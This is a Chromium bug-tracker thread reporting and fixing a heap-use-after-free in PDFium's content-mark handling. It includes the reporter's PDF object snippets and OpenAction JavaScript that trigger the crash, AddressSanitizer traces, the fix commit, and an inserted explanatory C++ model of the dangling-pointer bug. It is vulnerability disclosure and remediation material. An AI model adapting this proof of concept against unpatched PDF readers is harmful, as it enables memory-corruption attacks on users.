
Issue metadata

Status: Fixed
Owner:
Closed: Nov 5
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac , Fuchsia
Pri: 1
Type: Bug-Security




Issue 900552: Heap-use-after-free in CPDF_OCContext::CheckOCGVisible

Reported by chamal.d...@gmail.com, Oct 31

Issue description

VULNERABILITY DETAILS

The class in cpdf_contentmarkitem.h has the member mentioned below.
   UnownedPtr<CPDF_Dictionary> m_pPropertiesDict;
It is possible to create a PDF where the above m_pPropertiesDict points to the value dictionary of a form field.
So when the form field's value is changed, this m_pPropertiesDict object gets deleted. Further use of m_pPropertiesDict causes a use after free.

PDF File
--------
This section of the PDF file causes this bug.

{{object 4 0}} <<
  >>
stream
  (OC)
  /V
  BDC  //This content item has property /V
  BT
   /F1 20 Tf
   100 100 Td
   (Test) Tj
  ET
endstream
endobj
{{object 5 0}} <<
   /Properties 6 0 R   // The /Properties resource points to the form field's dictionary,
                       // so the content item's property /V will be retrieved from the form field's dictionary.
   /Font <<F1 7 0 R>>
  >>
endobj
{{object 6 0}} <<
  /FT /Tx
  /Type /Annot
  /Subtype /Widget
  /T (txt1)
  /F 4
  /Rect [200 200 400 400]
  /V <</A (b)>>
>>

JavaScript in OpenAction section of PDF file
---------------------------------------------
function run()
{
  this.getField('txt1').value='a';
}
app.setTimeOut('run()',3000);


VERSION
Chrome Version: [70.0.3538.67] + [stable]
Operating System: [Ubuntu 16.04, Windows 10]

REPRODUCTION CASE
1. Save the test.pdf and test.html files to the same location.
2. Open test.html with Chrome.
3. Wait 20 seconds. (A 20-second timeout is added to give the PDF file enough time to load and perform its Open Action.)
  The PDF plugin process will crash.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [PDF Plugin process]
Crash State: [Address Sanitizer output]

==1==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060000899e8 at pc 0x5618d087a0b3 bp 0x7fff4d2ea070 sp 0x7fff4d2ea068
READ of size 8 at 0x6060000899e8 thread T0 (chrome)
    #0 0x5618d087a0b2 in std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::__root() const /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:1092:59
    #1 0x5618d087a0b2 in std::__1::__tree_const_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long> std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::find<fxcrt::ByteString>(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:2574:0
    #2 0x5618d086e145 in std::__1::map<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >, std::__1::less<fxcrt::ByteString>, std::__1::allocator<std::__1::pair<fxcrt::ByteString const, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::find(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/map:1313:68
    #3 0x5618d086e145 in CPDF_Dictionary::GetObjectFor(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:87:0
    #4 0x5618d086ea1e in CPDF_Dictionary::GetStringFor(fxcrt::ByteString const&, fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:121:26
    #5 0x5618d04c126e in CPDF_OCContext::CheckOCGVisible(CPDF_Dictionary const*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_occontext.cpp:283:33
    #6 0x5618d04c1054 in CPDF_OCContext::CheckObjectVisible(CPDF_PageObject const*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_occontext.cpp:189:10
    #7 0x5618d0f68a40 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject*, CFX_Matrix const&, PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/render/cpdf_renderstatus.cpp:1099:34
    #8 0x5618d0f59fb1 in CPDF_ProgressiveRenderer::Continue(PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/render/cpdf_progressiverenderer.cpp:95:30
    #9 0x5618d0f57e63 in CPDF_ProgressiveRenderer::Start(PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/render/cpdf_progressiverenderer.cpp:44:3
    #10 0x5618e3076a76 in (anonymous namespace)::RenderPageImpl(CPDF_PageRenderContext*, CPDF_Page*, CFX_Matrix const&, FX_RECT const&, int, bool, IPDFSDK_PauseAdapter*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:132:26
    #11 0x5618e30730fa in RenderPageWithContext(CPDF_PageRenderContext*, fpdf_page_t__*, int, int, int, int, int, int, bool, IPDFSDK_PauseAdapter*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:917:3
    #12 0x5618e305d642 in FPDF_RenderPageBitmap_Start /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_progressive.cpp:60:3
    #13 0x5618e2ee09f2 in chrome_pdf::PDFiumEngine::ContinuePaint(int, pp::ImageData*) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2999:10
    #14 0x5618e2ede488 in chrome_pdf::PDFiumEngine::Paint(pp::Rect const&, pp::ImageData*, std::__1::vector<pp::Rect, std::__1::allocator<pp::Rect> >*, std::__1::vector<pp::Rect, std::__1::allocator<pp::Rect> >*) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:837:11
    #15 0x5618e2e712e8 in chrome_pdf::OutOfProcessInstance::OnPaint(std::__1::vector<pp::Rect, std::__1::allocator<pp::Rect> > const&, std::__1::vector<PaintManager::ReadyRect, std::__1::allocator<PaintManager::ReadyRect> >*, std::__1::vector<pp::Rect, std::__1::allocator<pp::Rect> >*) /home/chamal/chromium/src/out/asan/../../pdf/out_of_process_instance.cc:1221:16
    #16 0x5618e2ea7fca in PaintManager::DoPaint() /home/chamal/chromium/src/out/asan/../../pdf/paint_manager.cc:235:12
    #17 0x5618e2ea6b97 in PaintManager::OnManualCallbackComplete(int) /home/chamal/chromium/src/out/asan/../../pdf/paint_manager.cc:345:5
    #18 0x5618e2eaf5c4 in pp::CompletionCallbackFactory<PaintManager, pp::ThreadSafeThreadTraits>::Dispatcher0<void (PaintManager::*)(int)>::operator()(PaintManager*, int) /home/chamal/chromium/src/out/asan/../../ppapi/utility/completion_callback_factory.h:607:9
    #19 0x5618e2eaf337 in pp::CompletionCallbackFactory<PaintManager, pp::ThreadSafeThreadTraits>::CallbackData<pp::CompletionCallbackFactory<PaintManager, pp::ThreadSafeThreadTraits>::Dispatcher0<void (PaintManager::*)(int)> >::Thunk(void*, int) /home/chamal/chromium/src/out/asan/../../ppapi/utility/completion_callback_factory.h:584:7
    ....

0x6060000899e8 is located 40 bytes inside of 56-byte region [0x6060000899c0,0x6060000899f8)
freed by thread T0 (chrome) here:
    #0 0x5618c936b2e2 in operator delete(void*) _asan_rtl_:3
    #1 0x5618d086abf1 in CPDF_Dictionary::~CPDF_Dictionary() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:32:37
    #2 0x5618d0870cd4 in std::__1::default_delete<CPDF_Object>::operator()(CPDF_Object*) const /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:2325:5
    #3 0x5618d0870cd4 in std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >::reset(CPDF_Object*) /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:2638:0
    #4 0x5618d0870cd4 in std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >::operator=(std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >&&) /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:2504:0
    #5 0x5618d0870cd4 in CPDF_Dictionary::SetFor(fxcrt::ByteString const&, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:216:0
    #6 0x5618d046888f in std::__1::enable_if<CanInternStrings<CPDF_String>::value, CPDF_String*>::type CPDF_Dictionary::SetNewFor<CPDF_String, fxcrt::ByteString&, bool>(fxcrt::ByteString const&, fxcrt::ByteString&, bool&&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.h:93:28
    #7 0x5618d04630ae in CPDF_FormField::SetValue(fxcrt::WideString const&, bool, NotificationOption) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_formfield.cpp:384:18
    #8 0x5618d0463fa6 in CPDF_FormField::SetValue(fxcrt::WideString const&, NotificationOption) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_formfield.cpp:427:10
    #9 0x5618d12d5092 in (anonymous namespace)::SetValue(CPDFSDK_FormFillEnvironment*, fxcrt::WideString const&, int, std::__1::vector<fxcrt::WideString, std::__1::allocator<fxcrt::WideString> > const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_field.cpp:425:23
    #10 0x5618d12d3710 in CJS_Field::set_value(CJS_Runtime*, v8::Local<v8::Value>) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_field.cpp:2146:5
    #11 0x5618d132f3e3 in void JSPropSetter<CJS_Field, &(CJS_Field::set_value(CJS_Runtime*, v8::Local<v8::Value>))>(char const*, char const*, v8::Local<v8::String>, v8::Local<v8::Value>, v8::PropertyCallbackInfo<void> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/js_define.h:114:23
    #12 0x5618d12f4c80 in CJS_Field::set_value_static(v8::Local<v8::String>, v8::Local<v8::Value>, v8::PropertyCallbackInfo<void> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_field.h:93:3
   ....

previously allocated by thread T0 (chrome) here:
    #0 0x5618c936a6a2 in operator new(unsigned long) _asan_rtl_:3
    #1 0x5618d048eedf in pdfium::internal::MakeUniqueResult<CPDF_Dictionary>::Scalar pdfium::MakeUnique<CPDF_Dictionary, fxcrt::WeakPtr<fxcrt::StringPoolTemplate<fxcrt::ByteString>, std::__1::default_delete<fxcrt::StringPoolTemplate<fxcrt::ByteString> > >&>(fxcrt::WeakPtr<fxcrt::StringPoolTemplate<fxcrt::ByteString>, std::__1::default_delete<fxcrt::StringPoolTemplate<fxcrt::ByteString> > >&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/third_party/base/ptr_util.h:56:29
    #2 0x5618d097c2da in CPDF_SyntaxParser::GetObjectBodyInternal(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:481:9
    #3 0x5618d097c686 in CPDF_SyntaxParser::GetObjectBodyInternal(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:503:11
    #4 0x5618d098131f in CPDF_SyntaxParser::GetIndirectObject(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:556:7
    #5 0x5618d0927f99 in CPDF_Parser::ParseIndirectObjectAt(long, unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:921:28
    #6 0x5618d092a434 in CPDF_Parser::ParseIndirectObject(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:870:12
    #7 0x5618d088032e in CPDF_Document::ParseIndirectObject(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_document.cpp:195:33
    #8 0x5618d08c4a16 in CPDF_IndirectObjectHolder::GetOrParseIndirectObject(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_indirect_object_holder.cpp:50:42
    #9 0x5618d094e1e1 in CPDF_Reference::GetDirect() const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_reference.cpp:98:35
    #10 0x5618d086e7fd in CPDF_Dictionary::GetDirectObjectFor(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:99:17
    #11 0x5618d086ed9c in CPDF_Dictionary::GetDictFor(fxcrt::ByteString const&) const /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:148:26
    #12 0x5618d086ef3c in CPDF_Dictionary::GetDictFor(fxcrt::ByteString const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:160:50
    #13 0x5618d0e9e41b in CPDF_StreamContentParser::FindResourceObj(fxcrt::ByteString const&, fxcrt::ByteString const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_streamcontentparser.cpp:1146:42
    #14 0x5618d0e8884b in CPDF_StreamContentParser::Handle_BeginMarkedContent_Dictionary() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_streamcontentparser.cpp:603:17
    #15 0x5618d0e9af7b in CPDF_StreamContentParser::OnOperator(fxcrt::StringViewTemplate<char> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_streamcontentparser.cpp:572:5
    #16 0x5618d0eac196 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int, unsigned int, std::__1::vector<unsigned int, std::__1::allocator<unsigned int> > const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_streamcontentparser.cpp:1533:9
    #17 0x5618d0dae6e7 in CPDF_ContentParser::Parse() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_contentparser.cpp:211:33
    #18 0x5618d0daa776 in CPDF_ContentParser::Continue(PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_contentparser.cpp:133:22
    #19 0x5618d0e320ce in CPDF_PageObjectHolder::ContinueParse(PauseIndicatorIface*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_pageobjectholder.cpp:60:18
    #20 0x5618d0e2d945 in CPDF_Page::ParseContent() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/page/cpdf_page.cpp:110:3
    #21 0x5618e30720ff in FPDF_LoadPage /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:351:10
    #22 0x5618e2fcf475 in chrome_pdf::PDFiumPage::GetPage() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_page.cc:129:17
    #23 0x5618e2fd9aca in chrome_pdf::PDFiumPage::GetPageFeatures() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_page.cc:574:20
    #24 0x5618e2ed99f1 in chrome_pdf::PDFiumEngine::CalculateVisiblePages() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2871:55
    #25 0x5618e2ed6c22 in chrome_pdf::PDFiumEngine::PluginSizeUpdated(pp::Size const&) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:753:3
    #26 0x5618e2e674d6 in chrome_pdf::OutOfProcessInstance::OnGeometryChanged(double, float) /home/chamal/chromium/src/out/asan/../../pdf/out_of_process_instance.cc:1901:12
    #27 0x5618e2e77c33 in chrome_pdf::OutOfProcessInstance::DocumentSizeUpdated(pp::Size const&) /home/chamal/chromium/src/out/asan/../../pdf/out_of_process_instance.cc:1346:3
    #28 0x5618e2eebda2 in chrome_pdf::PDFiumEngine::LoadPageInfo(bool) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2791:14
    #29 0x5618e2f2d902 in chrome_pdf::PDFiumEngine::LoadPages() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2819:5


CREDIT INFORMATION
Reporter credit: [Anonymous]
 
Attachments:
test.pdf (1.2 KB)
test.html (165 bytes)

Comment 1 by palmer@chromium.org, Oct 31

Cc: thestig@chromium.org
Components: Internals>Plugins>PDF
Labels: Security_Severity-High Security_Impact-Stable M-71 OS-Android OS-Chrome OS-Fuchsia OS-Linux OS-Mac OS-Windows
Owner: tsepez@chromium.org
Status: Assigned (was: Unconfirmed)
tsepez, can you please pick this one up?

Comment 2 by tsepez@chromium.org, Oct 31

Repro'd.

Comment 3 by sheriffbot@chromium.org, Nov 1

Labels: Pri-1

Comment 4 by bugdroid1@chromium.org, Nov 1

The following revision refers to this bug:
  https://pdfium.googlesource.com/pdfium/+/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836

commit 9cdf613ce26b3bcdc566ae2f50ddb91ed9061836
Author: Tom Sepez <tsepez@chromium.org>
Date: Thu Nov 01 16:57:27 2018

Make CPDF_ContentMarkItem stop caching the properties dict.

It could be aliased with some other dictionary in the file. We
note that the dictionary one level up will always be an indirect
object in the sharing case, and indirect objects are persisted
by the IndirectObjectHolder, so hold a pointer to that and retrieve
the specific property_name field on the fly.

Bug:  chromium:900552 
Change-Id: I2e300020d6a7191648dd139a485b6d284e259976
Reviewed-on: https://pdfium-review.googlesource.com/c/44970
Commit-Queue: Tom Sepez <tsepez@chromium.org>
Reviewed-by: Lei Zhang <thestig@chromium.org>

[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_contentmarkitem.h
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_contentmarks.cpp
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_streamcontentparser.cpp
[add] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/testing/resources/bug_900552.pdf
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_contentmarks.h
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_streamcontentparser.h
[add] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/testing/resources/bug_900552.in
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/core/fpdfapi/page/cpdf_contentmarkitem.cpp
[modify] https://crrev.com/9cdf613ce26b3bcdc566ae2f50ddb91ed9061836/fpdfsdk/fpdf_formfill_embeddertest.cpp
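The lifetime problem in the report and the shape of the fix in the commit message above, as an added example that is not PDFium's code. Object, StringObject and Dictionary are simplified stand-ins for CPDF_Object, CPDF_String and CPDF_Dictionary; CachedMarkItem models the pre-fix CPDF_ContentMarkItem (caching the resolved /V dictionary in an unowned pointer), LiveMarkItem models the post-fix one (holding the indirect holder dictionary plus the key and resolving on each access), and RunScenario replays the report's sequence: the widget's /V dictionary is bound as the mark's properties, then the JavaScript value assignment replaces /V. All of those names are hypothetical. The example only inspects the numeric value of the stale pointer; it never dereferences freed storage.

```cpp
#include <cstdint>
#include <iostream>
#include <map>
#include <memory>
#include <string>
#include <utility>

// Stand-ins for PDFium's CPDF_Object / CPDF_String / CPDF_Dictionary (assumed,
// simplified; not PDFium's real classes). Entries are owned by unique_ptr, so
// overwriting a key destroys the old value at once, as in the freed-by trace.
struct Object {
  virtual ~Object() = default;
};

struct StringObject : Object {
  std::string value;
  explicit StringObject(std::string v) : value(std::move(v)) {}
};

struct Dictionary : Object {
  std::map<std::string, std::unique_ptr<Object>> entries;

  void SetFor(const std::string& key, std::unique_ptr<Object> obj) {
    entries[key] = std::move(obj);  // the previous value is freed here
  }
  const Object* GetObjectFor(const std::string& key) const {
    auto it = entries.find(key);
    return it == entries.end() ? nullptr : it->second.get();
  }
  const Dictionary* GetDictFor(const std::string& key) const {
    return dynamic_cast<const Dictionary*>(GetObjectFor(key));
  }
};

// Pre-fix shape of CPDF_ContentMarkItem (hypothetical): cache the resolved /V
// dictionary itself. Nothing pins that dictionary alive once its owner drops it.
struct CachedMarkItem {
  const Dictionary* properties = nullptr;  // plays UnownedPtr<CPDF_Dictionary> m_pPropertiesDict
  void SetProperties(const Dictionary& holder, const std::string& name) {
    properties = holder.GetDictFor(name);
  }
};

// Post-fix shape (hypothetical): remember the holder dictionary, which is an
// indirect object kept alive by the document, plus the key, and resolve the
// property dictionary on every access instead of caching it.
struct LiveMarkItem {
  const Dictionary* holder = nullptr;
  std::string name;
  void SetProperties(const Dictionary& h, const std::string& n) {
    holder = &h;
    name = n;
  }
  const Dictionary* GetProperties() const {
    return holder ? holder->GetDictFor(name) : nullptr;
  }
};

struct Outcome {
  bool both_resolve_before_edit;        // cached and live agree while /V is intact
  bool cached_still_holds_old_address;  // the cached pointer was never updated
  bool live_sees_replacement;           // live lookup reflects the new /V (not a dict)
};

// Replays the report: a widget dictionary (object 6 0) whose /V is a dictionary
// is reachable both as a form field and as the /Properties resource of the
// content stream. Constructed scenario, not PDFium code.
Outcome RunScenario() {
  Dictionary form_field;
  auto v = std::make_unique<Dictionary>();
  v->SetFor("A", std::make_unique<StringObject>("b"));
  form_field.SetFor("V", std::move(v));  // /V << /A (b) >>

  // "/V BDC": both item styles bind to property /V of the resource dictionary.
  CachedMarkItem cached;
  cached.SetProperties(form_field, "V");
  LiveMarkItem live;
  live.SetProperties(form_field, "V");

  Outcome out{};
  out.both_resolve_before_edit =
      cached.properties != nullptr && live.GetProperties() == cached.properties;
  const std::uintptr_t old_addr = reinterpret_cast<std::uintptr_t>(cached.properties);

  // JavaScript `this.getField('txt1').value = 'a'` -> CPDF_FormField::SetValue
  // stores a new string under /V, destroying the old dictionary.
  form_field.SetFor("V", std::make_unique<StringObject>("a"));

  // Only the pointer's numeric value is inspected; dereferencing it would be
  // the heap-use-after-free ASan reported in CheckOCGVisible.
  out.cached_still_holds_old_address =
      reinterpret_cast<std::uintptr_t>(cached.properties) == old_addr;
  // The live lookup re-resolves /V, finds a string rather than a dictionary,
  // and yields nullptr instead of a dangling dictionary pointer.
  out.live_sees_replacement = live.GetProperties() == nullptr;
  return out;
}

int main() {
  Outcome o = RunScenario();
  std::cout << "both resolve before edit: " << o.both_resolve_before_edit << '\n'
            << "cached pointer stale: " << o.cached_still_holds_old_address << '\n'
            << "live lookup safe: " << o.live_sees_replacement << '\n';
  return 0;
}
```

The design point is the one the commit message makes: an unowned pointer is only safe to cache when something with a longer lifetime owns the target. The /V entry is owned by the field dictionary and can be replaced by script at any time, whereas the field dictionary itself is an indirect object kept alive by the document, so the fix caches that stable parent and re-resolves the key on use. Callers of LiveMarkItem::GetProperties must still handle a null result, since the property may no longer be a dictionary.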

Comment 5 by bugdroid1@chromium.org, Nov 1

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/02cff454e822c3abb7b04566f7ab9e08d264b3fa

commit 02cff454e822c3abb7b04566f7ab9e08d264b3fa
Author: chromium-autoroll <chromium-autoroll@skia-public.iam.gserviceaccount.com>
Date: Thu Nov 01 18:38:19 2018

Roll src/third_party/pdfium ab688385cfbd..a69842065243 (5 commits)

https://pdfium.googlesource.com/pdfium.git/+log/ab688385cfbd..a69842065243


git log ab688385cfbd..a69842065243 --date=short --no-merges --format='%ad %ae %s'
2018-11-01 thestig@chromium.org Update third_party/yasm/BUILD.gn.
2018-11-01 thestig@chromium.org Roll third_party/skia/ edc6ea7a9..b98fb5b08 (131 commits; 1 trivial rolls)
2018-11-01 thestig@chromium.org Roll third_party/skia/ ffbcc3fad..edc6ea7a9 (1 commit)
2018-11-01 tsepez@chromium.org Make CPDF_ContentMarkItem stop caching the properties dict.
2018-11-01 tsepez@chromium.org Remove notion of file writing from CFX_GlobalData


Created with:
  gclient setdep -r src/third_party/pdfium@a69842065243

The AutoRoll server is located here: https://autoroll.skia.org/r/pdfium-autoroll

Documentation for the AutoRoller is here:
https://skia.googlesource.com/buildbot/+/master/autoroll/README.md

If the roll is causing failures, please contact the current sheriff, who should
be CC'd on the roll, and stop the roller if necessary.



BUG= chromium:900552 
TBR=dsinclair@chromium.org

Change-Id: Iaa3e70c669163835e43a0ca57563cd4406d90b3d
Reviewed-on: https://chromium-review.googlesource.com/c/1313032
Reviewed-by: chromium-autoroll <chromium-autoroll@skia-public.iam.gserviceaccount.com>
Commit-Queue: chromium-autoroll <chromium-autoroll@skia-public.iam.gserviceaccount.com>
Cr-Commit-Position: refs/heads/master@{#604650}
[modify] https://crrev.com/02cff454e822c3abb7b04566f7ab9e08d264b3fa/DEPS

Comment 6 by tsepez@chromium.org, Nov 5

Status: Fixed (was: Assigned)

Comment 7 by sheriffbot@chromium.org, Nov 6

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 8 by sheriffbot@chromium.org, Nov 8

Labels: Merge-Request-71

Comment 9 by sheriffbot@chromium.org, Nov 8

Labels: -Merge-Request-71 Hotlist-Merge-Review Merge-Review-71
This bug requires manual review: DEPS changes referenced in bugdroid comments.
Please contact the milestone owner if you have questions.
Owners: benmason@(Android), kariahda@(iOS), kbleicher@(ChromeOS), govind@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 10 by gov...@chromium.org, Nov 8

Cc: awhalley@google.com
+awhalley@ (Security TPM) for M71 merge review.

Comment 11 by awhalley@google.com, Nov 8

@govind - good for 71

Comment 12 by gov...@chromium.org, Nov 8

Labels: -Merge-Review-71 Merge-Approved-71
Approving merge to M71 branch 3578 based on comment #11. Please merge ASAP. Thank you.

Comment 13 by tsepez@chromium.org, Nov 8

Merge conflict; if we are taking the fix to https://bugs.chromium.org/p/chromium/issues/detail?id=901654, that will cover this case as well even without this patch.

Comment 14 by awhalley@google.com, Nov 8

Labels: -Merge-Approved-71 Merge-Rejected-71
Thanks tsepez@ - I'll move the merge request over to that bug.

Comment 15 by awhalley@chromium.org, Nov 12

Labels: reward-topanel

Comment 16 by awhalley@google.com, Nov 28

Labels: -M-71 M-72

Comment 17 by awhalley@chromium.org, Dec 3

Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************

Comment 18 by awhalley@google.com, Dec 3

Thanks chamal.desilva@! The VRP panel decided to award $3,000 for this report. Thanks as ever!

Comment 19 by awhalley@google.com, Dec 3

Labels: -reward-unpaid reward-inprocess

Comment 20 by awhalley@google.com, Jan 28

Labels: Release-0-M72

Comment 21 by awhalley@chromium.org, Jan 28

Labels: CVE-2019-5762 CVE_description-missing

Comment 22 by sheriffbot@chromium.org, Feb 12 (6 days ago)

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 23 by awhalley@chromium.org, Today (5 hours ago)

Labels: -CVE_description-missing CVE_description-submitted
